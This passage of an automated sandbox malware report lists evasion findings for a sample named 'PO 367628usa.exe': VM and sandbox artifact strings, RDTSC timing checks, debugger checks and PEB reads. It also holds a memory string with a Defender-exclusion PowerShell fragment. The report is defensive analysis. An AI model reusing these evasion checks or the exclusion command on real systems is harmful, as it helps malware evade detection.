Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO 367628usa.exe PID: 6596, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO 367628usa.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000009185E4 second address: 00000000009185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 000000000091897E second address: 0000000000918984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\PO 367628usa.exe

Code function: 5_2_004088B0 rdtsc

5_2_004088B0

Source: C:\Users\user\Desktop\PO 367628usa.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe TID: 6600	Thread sleep time: -101657s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe TID: 6620	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO 367628usa.exe	Thread delayed: delay time: 101657			Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.371026456.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.371059787.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.367358532.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.371235181.000000000851A000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: raserver.exe, 00000009.00000002.589860170.0000000002F07000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.371286813.0000000008552000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.367358532.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.371026456.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.370907968.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.370907968.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000006.00000000.371059787.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000006.00000002.589360759.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000006.00000000.366615816.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PO 367628usa.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe

Code function: 0_2_00DD16E8 CheckRemoteDebuggerPresent,

0_2_00DD16E8

Source: C:\Users\user\Desktop\PO 367628usa.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe

Code function: 5_2_004088B0 rdtsc

5_2_004088B0

Source: C:\Users\user\Desktop\PO 367628usa.exe

Code function: 5_2_00409B20 LdrLoadDll,

5_2_00409B20

Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FA185 mov eax, dword ptr fs:[00000030h]	5_2_018FA185
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EC182 mov eax, dword ptr fs:[00000030h]	5_2_018EC182
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2990 mov eax, dword ptr fs:[00000030h]	5_2_018F2990
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]	5_2_019451BE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]	5_2_019451BE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]	5_2_019451BE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019451BE mov eax, dword ptr fs:[00000030h]	5_2_019451BE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F61A0 mov eax, dword ptr fs:[00000030h]	5_2_018F61A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F61A0 mov eax, dword ptr fs:[00000030h]	5_2_018F61A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019469A6 mov eax, dword ptr fs:[00000030h]	5_2_019469A6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]	5_2_019849A4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]	5_2_019849A4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]	5_2_019849A4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019849A4 mov eax, dword ptr fs:[00000030h]	5_2_019849A4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_018CB1E1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_018CB1E1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_018CB1E1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019541E8 mov eax, dword ptr fs:[00000030h]	5_2_019541E8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9100 mov eax, dword ptr fs:[00000030h]	5_2_018C9100
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9100 mov eax, dword ptr fs:[00000030h]	5_2_018C9100
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9100 mov eax, dword ptr fs:[00000030h]	5_2_018C9100
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]	5_2_018E4120
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]	5_2_018E4120
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]	5_2_018E4120
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E4120 mov eax, dword ptr fs:[00000030h]	5_2_018E4120
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E4120 mov ecx, dword ptr fs:[00000030h]	5_2_018E4120
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F513A mov eax, dword ptr fs:[00000030h]	5_2_018F513A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F513A mov eax, dword ptr fs:[00000030h]	5_2_018F513A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EB944 mov eax, dword ptr fs:[00000030h]	5_2_018EB944
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EB944 mov eax, dword ptr fs:[00000030h]	5_2_018EB944
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CC962 mov eax, dword ptr fs:[00000030h]	5_2_018CC962
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CB171 mov eax, dword ptr fs:[00000030h]	5_2_018CB171
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CB171 mov eax, dword ptr fs:[00000030h]	5_2_018CB171
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9080 mov eax, dword ptr fs:[00000030h]	5_2_018C9080
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01943884 mov eax, dword ptr fs:[00000030h]	5_2_01943884
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01943884 mov eax, dword ptr fs:[00000030h]	5_2_01943884
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0 mov eax, dword ptr fs:[00000030h]	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FF0BF mov ecx, dword ptr fs:[00000030h]	5_2_018FF0BF
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FF0BF mov eax, dword ptr fs:[00000030h]	5_2_018FF0BF
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FF0BF mov eax, dword ptr fs:[00000030h]	5_2_018FF0BF
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019090AF mov eax, dword ptr fs:[00000030h]	5_2_019090AF
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0195B8D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_0195B8D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0195B8D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0195B8D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0195B8D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0195B8D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C58EC mov eax, dword ptr fs:[00000030h]	5_2_018C58EC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C40E1 mov eax, dword ptr fs:[00000030h]	5_2_018C40E1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C40E1 mov eax, dword ptr fs:[00000030h]	5_2_018C40E1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C40E1 mov eax, dword ptr fs:[00000030h]	5_2_018C40E1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01947016 mov eax, dword ptr fs:[00000030h]	5_2_01947016
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01947016 mov eax, dword ptr fs:[00000030h]	5_2_01947016
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01947016 mov eax, dword ptr fs:[00000030h]	5_2_01947016
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01994015 mov eax, dword ptr fs:[00000030h]	5_2_01994015
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01994015 mov eax, dword ptr fs:[00000030h]	5_2_01994015
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]	5_2_018F002D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]	5_2_018F002D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]	5_2_018F002D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]	5_2_018F002D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F002D mov eax, dword ptr fs:[00000030h]	5_2_018F002D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]	5_2_018DB02A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]	5_2_018DB02A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]	5_2_018DB02A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DB02A mov eax, dword ptr fs:[00000030h]	5_2_018DB02A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E0050 mov eax, dword ptr fs:[00000030h]	5_2_018E0050
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E0050 mov eax, dword ptr fs:[00000030h]	5_2_018E0050
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01982073 mov eax, dword ptr fs:[00000030h]	5_2_01982073
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01991074 mov eax, dword ptr fs:[00000030h]	5_2_01991074
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D1B8F mov eax, dword ptr fs:[00000030h]	5_2_018D1B8F
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D1B8F mov eax, dword ptr fs:[00000030h]	5_2_018D1B8F
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198138A mov eax, dword ptr fs:[00000030h]	5_2_0198138A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0197D380 mov ecx, dword ptr fs:[00000030h]	5_2_0197D380
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2397 mov eax, dword ptr fs:[00000030h]	5_2_018F2397
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FB390 mov eax, dword ptr fs:[00000030h]	5_2_018FB390
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F4BAD mov eax, dword ptr fs:[00000030h]	5_2_018F4BAD
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F4BAD mov eax, dword ptr fs:[00000030h]	5_2_018F4BAD
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F4BAD mov eax, dword ptr fs:[00000030h]	5_2_018F4BAD
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01995BA5 mov eax, dword ptr fs:[00000030h]	5_2_01995BA5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019453CA mov eax, dword ptr fs:[00000030h]	5_2_019453CA
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019453CA mov eax, dword ptr fs:[00000030h]	5_2_019453CA
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EDBE9 mov eax, dword ptr fs:[00000030h]	5_2_018EDBE9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]	5_2_018F03E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]	5_2_018F03E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]	5_2_018F03E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]	5_2_018F03E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]	5_2_018F03E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F03E2 mov eax, dword ptr fs:[00000030h]	5_2_018F03E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198131B mov eax, dword ptr fs:[00000030h]	5_2_0198131B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01998B58 mov eax, dword ptr fs:[00000030h]	5_2_01998B58
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CDB40 mov eax, dword ptr fs:[00000030h]	5_2_018CDB40
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CF358 mov eax, dword ptr fs:[00000030h]	5_2_018CF358
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CDB60 mov ecx, dword ptr fs:[00000030h]	5_2_018CDB60
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F3B7A mov eax, dword ptr fs:[00000030h]	5_2_018F3B7A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F3B7A mov eax, dword ptr fs:[00000030h]	5_2_018F3B7A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FD294 mov eax, dword ptr fs:[00000030h]	5_2_018FD294
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FD294 mov eax, dword ptr fs:[00000030h]	5_2_018FD294
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]	5_2_018C52A5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]	5_2_018C52A5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]	5_2_018C52A5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]	5_2_018C52A5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C52A5 mov eax, dword ptr fs:[00000030h]	5_2_018C52A5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_018DAAB0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_018DAAB0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FFAB0 mov eax, dword ptr fs:[00000030h]	5_2_018FFAB0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2ACB mov eax, dword ptr fs:[00000030h]	5_2_018F2ACB
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2AE4 mov eax, dword ptr fs:[00000030h]	5_2_018F2AE4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D8A0A mov eax, dword ptr fs:[00000030h]	5_2_018D8A0A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198AA16 mov eax, dword ptr fs:[00000030h]	5_2_0198AA16
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198AA16 mov eax, dword ptr fs:[00000030h]	5_2_0198AA16
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E3A1C mov eax, dword ptr fs:[00000030h]	5_2_018E3A1C
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CAA16 mov eax, dword ptr fs:[00000030h]	5_2_018CAA16
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CAA16 mov eax, dword ptr fs:[00000030h]	5_2_018CAA16
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C5210 mov eax, dword ptr fs:[00000030h]	5_2_018C5210
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C5210 mov ecx, dword ptr fs:[00000030h]	5_2_018C5210
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C5210 mov eax, dword ptr fs:[00000030h]	5_2_018C5210
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C5210 mov eax, dword ptr fs:[00000030h]	5_2_018C5210
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01904A2C mov eax, dword ptr fs:[00000030h]	5_2_01904A2C
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01904A2C mov eax, dword ptr fs:[00000030h]	5_2_01904A2C
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01954257 mov eax, dword ptr fs:[00000030h]	5_2_01954257
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]	5_2_018C9240
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]	5_2_018C9240
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]	5_2_018C9240
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C9240 mov eax, dword ptr fs:[00000030h]	5_2_018C9240
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198EA55 mov eax, dword ptr fs:[00000030h]	5_2_0198EA55
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0190927A mov eax, dword ptr fs:[00000030h]	5_2_0190927A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0197B260 mov eax, dword ptr fs:[00000030h]	5_2_0197B260
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0197B260 mov eax, dword ptr fs:[00000030h]	5_2_0197B260
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01998A62 mov eax, dword ptr fs:[00000030h]	5_2_01998A62
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]	5_2_018C2D8A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]	5_2_018C2D8A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]	5_2_018C2D8A
